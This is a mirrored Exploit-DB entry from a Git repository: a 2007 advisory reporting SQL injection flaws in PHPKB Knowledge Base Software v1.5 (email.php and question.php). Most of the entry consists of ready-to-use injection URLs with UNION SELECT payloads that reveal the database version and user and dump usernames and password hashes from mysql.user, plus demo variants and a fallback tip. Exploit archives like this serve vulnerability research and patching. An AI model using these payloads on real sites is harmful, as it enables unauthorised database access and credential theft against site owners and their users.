bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/6510.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

65 lines
No EOL
2 KiB
Text
Raw Blame History

[~] PHPKB Knowledge Base Software v1.5 Professional (email.php) - SQL Injection Vulnerability
[~]
[~] http://www.knowledgebase-script.com
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 20.09.2007
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest|Gibon|Pig
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/email.php?ID=SQL
[~]
[~] Demo :-
[~]
[~]
[~] http://xxxx.com/email.php?ID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*
[~]
[~]----------------------------------------------------------------------------------------------------------------------
2
[~] PHPKB Knowledge Base Software v1.5 Professional (question.php) - SQL Injection Vulnerability
[~]
[~] http://www.knowledgebase-script.com
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 20.09.2007
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest|Gibon|Pig
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/question.php?ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/*
[~] http://site.com/question.php?ID=1 UNION SELECT concat(user,char(58),password) FROM mysql.user/*
[~]
[~] If he does not work test yet -> /question.php?ID=-1
[~]
[~] Demo :-
[~]
[~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat(user,char(58),password)%20FROM%20mysql.user%20/*
[~]
[~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())/*
[~]
[~]----------------------------------------------------------------------------------------------------------------------
# milw0rm.com [2008-09-21]
Reference in a new issue View git blame Copy permalink